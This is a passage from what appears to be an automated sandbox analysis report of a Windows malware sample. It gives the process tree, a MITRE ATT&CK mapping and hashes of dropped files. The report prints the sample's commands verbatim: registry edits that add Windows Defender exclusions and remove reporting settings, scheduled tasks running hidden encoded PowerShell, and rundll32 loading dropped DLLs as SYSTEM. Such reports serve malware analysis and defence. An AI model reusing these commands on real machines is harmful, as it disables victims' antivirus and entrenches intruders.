Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4408 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵PID:2044
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵PID:5756
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵PID:5288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵PID:5360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵PID:5392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:323⤵PID:3192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:643⤵PID:4540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:323⤵PID:440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:643⤵PID:5744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:323⤵PID:4472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:643⤵PID:3952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:323⤵PID:5980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:643⤵PID:2924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:323⤵PID:5780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:643⤵PID:2344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:323⤵PID:1800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:643⤵PID:1872
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXmMMWGSr" /SC once /ST 00:54:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXmMMWGSr"2⤵PID:5500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXmMMWGSr"2⤵PID:5864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 00:33:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe\" Ty /zHsite_idTXl 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mRaseIvrfxDtBOYKW"2⤵PID:6004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:516 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5036
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1848
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3572
-
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exeC:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe Ty /zHsite_idTXl 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:6056 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"2⤵PID:4264
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3528
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4204
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:5808
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\TRDYCX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\ABWjUqu.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "eGwAoTnpAObQfPU"2⤵PID:6040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eGwAoTnpAObQfPU"2⤵PID:4204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\kWMHQKZ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:6068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\KXGcMEN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ArGlQVg.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\uLcyUgC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 01:49:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll\",#1 /LPsite_idCBc 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FTXCzbcEvROqagNdd"2⤵PID:2052
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2000
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4492
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:2084
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:5924
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"2⤵PID:5912
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll",#1 /LPsite_idCBc 3851181⤵PID:440
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll",#1 /LPsite_idCBc 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:5280 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"3⤵PID:5116
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
3Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
384KB
MD502cee518ef7a6090e03aef118f7e3214
SHA13c2cc060c629f4cf97b13df0ff4491ec858d2667
SHA2567881f16a0d87799fa09d71c25346aff7f10517b44858ac14521a9c62e43a9b4e
SHA512ade7cdf54a3869069d9f5c74976ab470733924b34f2946996fdb9db843d188ba2490dbd25becc7c6b324dc7acc6f96fd980e5d47027890c1d6a0161306b5cac5
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
128KB
MD5a47c9a22d04f7a89ffb338ec0d9163f2
SHA1c779b4e0bd380889d053a5a2e64fac7e5c9f0d85
SHA256c67b8f01d1b007cf0abea4f89d1272a146116b398d97c0873889e4f3bc1aa2a5
SHA51264ebbee2f2f0884096e5b0996b30adae289549ba24f19fb3858f638148f358cd9a6f2fb370c0b2a44e821cb00b5a49468f849c97e9aa8ee413bbae11b57d72f4
-
Filesize
154KB
MD5920a163c866396f3f3e8e7c5167e09c4
SHA1e7c862b9acecbab1a3480b90726ad05ee22d13af
SHA2567fb2143ccf49e48006d60a7b1607d4a421b6c120ae1a25d820518f810ea223dd
SHA512c26102f8cd342029e8de7a789d1740126012e5c7700ece3178a0bffc80282fb2698a728d1c9846d0b0c3a9a498f0cfec939394194d23027ace610fd3aa0138ea
-
Filesize
65KB
MD5cc27665491f5bc1e20adadbbd4cd6999
SHA11a01f7715f366269d58e0cd994f44beb8688d1a3
SHA256fa26987a3f6d30a23c8fa57800ce2dde7f440be1ab66e57a2611e9e239599ad5
SHA5124a6d7e94a70037aeca23562e5285f106c018081a7c4f7b765e109bf09c70361f292e09cca1075a3fb499cde7a0cf338abc87f93a931ec14f5599dd961cb1f8a0
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD585a0f93ea503b31a86f73a9e18338a8f
SHA1c90e0392dbef35d28360f2f6775523a2a601b73c
SHA25644904d113f31e65946b3df2901348b9a3844e4ef347dd66d63fc68141da48115
SHA5126ee3e40cbda78b721ec2c39c8d81edcec60ecc2f6ad238b4e5501f6b4f3fb0f01e0cc00b4444677d7c6db0c7bf4e20098e80ef563b62cdea9bded6bfe93d6013
-
Filesize
34KB
MD55be4bcea71a53e213d346a603bd3bfac
SHA14f103d1fa1ca9bfa82a08f9128b05db8cd52b1c6
SHA256d597731b02d59bda87c7196999dde832494e03e1488396387399a0ca911f9bc7
SHA5122dd0234289d76a6e313b170f89dc40d7989623d4da742898018cbf8fbce946feec2209465e8cd985d56f729490bcc978e17078f6f0b22af14526114e77bee56c
-
Filesize
2KB
MD5a6ea7bfcd3aac150c0caef765cb52281
SHA1037dc22c46a0eb0b9ad4c74088129e387cffe96b
SHA256f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9
SHA512c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD503e015f325b17e6fd9c389f7d87442af
SHA1a51d6cf13a9a06c17e0ad6eb12f50c6d2b467244
SHA256b63bc97c5a9e854c8e8baa68eaebda2a5c3f5fff3c328c5ea486e2444af9c013
SHA5124ca72e6c8e0ea391aabd14f4bd76f771e9230ed390226ecd96649f65d21bc263a03731f90136ead2173e0568a927899c83b58a1dfc92cce54877aefde2900129
-
Filesize
21KB
MD5a59b3ffca1fd691fd8b26daa1700afe1
SHA14c49a7e7d64a518000e9fdf96dc74f081240c993
SHA25654d1173d12495fb4d272889964e7df76a497fc782523be11898d318ded68d9ed
SHA51285c5ffe343e3e34362d878de5886cacf2a7a67e867af003a035efff6acc17a17a4bf42d3b62ee367e599041bdfc3773ace2d8c533d4bf7c38000fd50c0125bb2
-
Filesize
806KB
MD51f3b04e40f5fb499c11f2e8614021638
SHA1825dace5c4e3be079696bc141dabeb46b5ca02ef
SHA256cc04dacc655c5178b533c6b352085a7ec8b783f1d5ecb87362c061046d9453b7
SHA512bc966c6389a905513f07eb5a54080ea4256b7ce703bdcd1e097672c2c4aa87a7444d5911b45973c2e3d9d59cefa94e1ae214b691a071c52f98e8db2961f6078c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\additional_file0.tmp
Filesize1.0MB
MD55e134d772073b5ac5113d0b4ae31c0f6
SHA16040526963f03ba01153a9aefaa6a1a5b0c18703
SHA256124866911e021e913521d8d72d41fffc2ae94012f962d930bd347fd56d5a763f
SHA51255b81f9f9de89be2c650abf31f418c57bb5e1e1e898168dd80a25ca2ea9ecbbe0677652037e953c6ce227227893ce9ab4666dfab36016ff56774219f79f99008
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
Filesize957KB
MD53f32bcd03970abf1bf87a9367df6e6a6
SHA1bf4819355b3444883883014dd6a908309d367c09
SHA2566714337224a71f3d254e6cfb2774613af27c5ca5e029cb25b055ad4b972a5f20
SHA512d1192c5a96bcca8ab1643c12e8a8b635f919f8eed1e5fb294693ce1d6163ad8cac525b48744acfacc121ad50bb5f2ff0487f3653a6021dca3ac71a066faabd61
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
Filesize1.0MB
MD515f1ac80584efd91a1d07f3cc32036c7
SHA1fb073862ad0f2964312f4eb3cb861bd99661b9e2
SHA256befe3e4a093b77c47036770d6f32aeab6ad6db5c06ffa8544c6be9bb4789aee6
SHA51288b8a04fe9b6876f71bc2ebe5797f275a2e77666634115a628484a684dbf98cb40e4256656f5d85a0843ffa431b0e1b49f9fdb99c46f754bcd4bb8d6b006271c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe
Filesize1.7MB
MD58fa2408d910be9dce6f9858022150406
SHA103dc0edc485333c3717cd58bae04098a583cf736
SHA256098230832f445dfefd5c5a3e5265e14dc1b8256463956dcf663119f2f684be9b
SHA5123f4360560921dd0a9b40c720593a09bc896381bd90c2c42f16c5117d27d03dca1b113d4089707d6e2fed93c4cec65bed24dcbae838399fd24957b6da95230359
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe
Filesize1.2MB
MD56c6af30fc8c72df4054836835cdcc2b9
SHA1a4178dde02ba2fe7200394363f8295e30cbe7f0e
SHA256e59b794d2a8a95ce735116ff5c7ab7c490ef25bdac66bbe0325da015183cf4d4
SHA51237384582b8cf545bb7f1304fcc9abddc12b21aff6f5ec36163bee7c485a4ae585f64589cef7e07a397d3f04e491497a119ea5fbce71aeeb22b92093fae886a67
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbgcore.dll
Filesize166KB
MD58b6f64e5d3a608b434079e50a1277913
SHA103f431fabf1c99a48b449099455c1575893d9f32
SHA256926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2
SHA512c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
Filesize1.6MB
MD586aae03168dc5769d0bb2a6c678c3f9f
SHA1b303ea8334145c03ef9449dcc13fff7e5ad7e23e
SHA2562de5ddb62d5f1a1ae0a3873365cda0dd391f1b9560c2759d7c349b0a22dca907
SHA5120ca8e79ec66c8141f3690e0a7d1554f0be8cbbafec12c5ed85a5b95cfed5288ec79affbca044a5c097354a233067a495dd6758e98fda0f573fd57f8c3c171515
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
Filesize1.7MB
MD5925ea07f594d3fce3f73ede370d92ef7
SHA1f67ea921368c288a9d3728158c3f80213d89d7c2
SHA2566d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9
SHA512a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
Filesize1.4MB
MD514f3dacbc42e9fa889a042c94dfbaf6b
SHA1cb00b215ed3ca23d61bd365c5a3fa80d0d64dc23
SHA2566aea23c8b5474adcc0051455b11ef1dc71fe40e8fc3f427936107d7091281f56
SHA512b80799c3eb6f40d93b8633484421e8d2f3cf36a9656730db955d4c398374278a2b7fe146b6018c76137fc1174a2df617adf52083de157dd997b122ced4434198
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\opera_package
Filesize2.2MB
MD576c7a0520803d8b5f8498a680cc7f6e9
SHA18d25f6bcee148c9f63cea17e1c3dcc61c08165bc
SHA256f5bf542621626f7edee65802297ce1980c8f30077407195d441fef652e9ca57c
SHA512efa80db2af34d26e3f0a2f240318b0ead55de62752ab159e5aa6564b3e5fc5b5ad962cc64d1a3114df22489532c80c45695e927dd3b75ecce899580f3a58eb31
-
Filesize
244KB
MD575e0fc12564702e9f5fdc6b2b28d9699
SHA1d3e7534b6eb77f6c0c64f78388b6f7af03e1aea8
SHA256853cdd1f3941e0936deff87b6c66521cfadb4d2349a5e6bd54f8e4ca3cb85d5e
SHA512e9d03b353ac85acb087d6bd1f2fb96bdbe60184d554a0c7fd5f9d1ed446e1cddaf028dcaa30c66b8c148442733eab5c7d51292c87ca3138a8b323a84326ccd5c
-
Filesize
288KB
MD50efdaaa1f0da61ea61631e2739824d84
SHA1ebb4510cd8f1a31d0de70f46e6383a57f01b432c
SHA2566206911fa12a8ec32853b8a2d2902ab209b3c5af39524a3d5b58e3c04c231a45
